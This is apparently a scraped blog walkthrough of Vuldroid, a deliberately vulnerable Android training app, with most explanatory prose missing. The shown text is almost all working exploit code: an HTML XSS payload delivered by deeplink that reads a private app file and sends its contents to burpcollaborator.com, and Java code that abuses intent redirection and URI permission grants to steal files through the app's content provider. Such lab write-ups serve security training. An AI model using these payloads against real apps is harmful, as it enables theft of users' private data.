[UPDATED]Vuldroid App Walkthrough

Manifest File
<intent-filter android:autoVerify="true">
Deeplink Xss
<!DOCTYPE html>
<html>
<body>
<h1>File Sent to Server</h1>
<script>
function sendmefiles(filepath, url){
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
var upload = new XMLHttpRequest();
upload.open("GET", url + "?" + this.responseText , false)
upload.send()
};
xhttp.open("GET", filepath, false);
xhttp.send();
}
window.onload=sendmefiles("file:///data/user/0/com.vuldroid.application/files/example.txt", "https://burpcollaborator.com")
</script>
</body>
</html>
http://medium.com?url=file:///exploit.html
Intent extra = new Intent();
extra.setFlags(Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION | Intent.FLAG_GRANT_PREFIX_URI_PERMISSION | Intent.FLAG_GRANT_READ_URI_PERMISSION | Intent.FLAG_GRANT_WRITE_URI_PERMISSION);
extra.setClassName(getPackageName(), "com.notify.vuldroidexploit.FileStealDisplay");
extra.setData(Uri.parse("content://com.vuldroid.application.provider/"));

Intent intent = new Intent();
intent.setClassName("com.vuldroid.application", "com.vuldroid.application.RoutingActivity");
intent.putExtra("router_component", extra);
startActivity(intent);
TextView t1=findViewById(R.id.filestealv);
Uri uri = Uri.parse(getIntent().getDataString() + "root/data/data/com.vuldroid.application/files/example.txt");

try {
InputStream i = getContentResolver().openInputStream(uri);
InputStreamReader isReader = new InputStreamReader(i);
BufferedReader reader = new BufferedReader(isReader);
StringBuffer sb = new StringBuffer();
String str;
while((str = reader.readLine())!= null){
t1.setText(str);
i.close();
}

}catch (FileNotFoundException e) {
e.printStackTrace();
} catch (IOException e) {
e.printStackTrace();
}
Sender File
Reciever Ends
Broadcast receiver

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store